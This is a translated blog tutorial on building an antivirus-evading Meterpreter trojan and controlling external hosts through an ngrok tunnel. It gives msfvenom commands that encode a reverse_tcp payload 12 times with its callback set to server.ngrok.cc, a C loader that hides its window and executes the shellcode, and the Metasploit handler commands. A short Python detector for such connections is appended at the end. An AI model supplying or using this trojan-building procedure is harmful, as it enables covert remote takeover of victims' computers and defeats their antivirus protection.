Metasploit intranet penetration

Disclaimer: The techniques, ideas and tools covered in this article are provided only for learning and exchange on security topics. Nobody may use them for illegal or profit-making purposes; anyone who does bears the consequences themselves!

Metasploit experiment: making an AV-evading payload and remotely controlling any "external network" host
The implementation of this experiment is split into the following three modules:

1. Intranet penetration to the external network
2. Making the AV-evading Trojan backdoor
3. The Metasploit control client

Environmental preparation

Operating system   Use                              IP address                  Software needed
Kali               Make payload, attack, map port   192.168.1.130               Metasploit, Ngrok
Win7               Make payload                     omitted                     VC++ 6.0
Win10              Client computer                  any public network address  none

Intranet penetrates to external network

First, we need to download an intranet penetration tool that performs port mapping and forwarding.
Here I use the Linux 64-bit client:

https://www.ngrok.cc/#down-client

Next, register an account on the website above and log in.
Then apply for a free tunnel: choose the TCP protocol and set a custom remote port. The local IP address is the IP address of Kali; the local port is your choice, but make sure it does not conflict with anything else.
Make a note of the tunnel id, the custom remote port, and the Kali local port; all three are needed later.

Place the downloaded client in a directory of your choice, cd into that directory, and start ngrok from the command line (replace the placeholder with the tunnel id from the previous step):

./sunny clientid <tunnel id>

This completes the port mapping: data received on the external network port is forwarded to the chosen port on the local Kali machine. Intranet penetration has many other uses; the documentation is linked below and is not repeated here.

https://ngrok.com/docs

Make an AV-evading Trojan backdoor

First, generate a payload with msfvenom in kali

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=server.ngrok.cc lport=11206 -f c

In the command above, -p selects the payload, -e selects the encoder (different encoders evade different products to different degrees; some have a noticeable effect against AV software such as Huorong), -i is the number of encoding iterations, -b lists the bad characters to avoid, lhost is the ngrok server address you were assigned, lport is the custom remote port, and -f selects the output format.

I chose to generate a C-language array. You can also use the following command to produce the exe Trojan directly, but the evasion effect will be weaker. After many tests by the author, the evasion effect is very strong after 12 rounds of encoding!

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=server.ngrok.cc lport=11206 -f exe > haya.exe

Then copy the buf array from the generated shellcode output. Compile the following code with VC6.0 under Win7 to obtain the Trojan.

#include <stdio.h>
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"") // do not show a window at run time
unsigned char buf[] =
"buf array"; // paste the copied array here
int main(void)
{
    ((void(*)(void))&buf)();
    return 0;
}


Metasploit control client

Switch to Kali and use Metasploit to listen.
Set the listening module, the payload, the IP (Kali local address), and the port (the custom local port configured in ngrok), then run exploit.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.130
set lport 12345
exploit

When the client executes the Trojan, it gets a meterpreter.
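Seen from the client side, the setup above is an unsigned binary in a user-writable folder opening an outbound TCP connection to a public tunnelling service on an unusual port, which is what a defender can look for. The following is an added example, not part of the original article: it scores constructed records shaped like Sysmon Event ID 3 (network connection) and flags the ones that match that pattern; the field names and the host list are assumptions.

```python
import re

# Public tunnelling services that forward a TCP port to a hidden host; from the
# victim's side the ngrok setup above is an outbound connection to one of these.
TUNNEL_SUFFIXES = (".ngrok.cc", ".ngrok.io", ".ngrok.com")
USER_WRITABLE = re.compile(r"\\(Users|Temp|AppData|Downloads|Public)\\", re.IGNORECASE)
COMMON_PORTS = {53, 80, 443}

# Constructed sample records (not real telemetry), flattened to key=value pairs.
SAMPLE_EVENTS = [
    "EventID=3|Image=C:\\Program Files\\Mozilla Firefox\\firefox.exe"
    "|DestinationHostname=www.example.com|DestinationPort=443",
    "EventID=3|Image=C:\\Users\\bob\\Downloads\\haya.exe"
    "|DestinationHostname=server.ngrok.cc|DestinationPort=11206",
    "EventID=3|Image=C:\\Windows\\System32\\svchost.exe"
    "|DestinationHostname=update.example.net|DestinationPort=80",
]

def parse_event(line):
    return dict(kv.split("=", 1) for kv in line.split("|"))

def score_connection(ev):
    """Score one network-connection event; higher means more handler-like."""
    if ev.get("EventID") != "3":
        return 0, []
    score, reasons = 0, []
    host = ev.get("DestinationHostname", "").lower()
    if host.endswith(TUNNEL_SUFFIXES):
        score += 3
        reasons.append(f"tunnel service {host}")
    port = int(ev.get("DestinationPort", "0"))
    if port not in COMMON_PORTS:
        score += 1
        reasons.append(f"uncommon port {port}")
    if USER_WRITABLE.search(ev.get("Image", "")):
        score += 2
        reasons.append("binary in user-writable path")
    return score, reasons

def find_suspicious(lines, threshold=4):
    """Return (image, score, reasons) for every event at or above threshold."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        score, reasons = score_connection(ev)
        if score >= threshold:
            hits.append((ev["Image"], score, reasons))
    return hits
```

Only the haya.exe record reaches the threshold; the browser and svchost connections score 0 because they use common ports, non-tunnel hosts and protected install paths.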

Original article: https://www.freebuf.com/sectool/136736.html


Origin blog.csdn.net/qq_45521281/article/details/105424137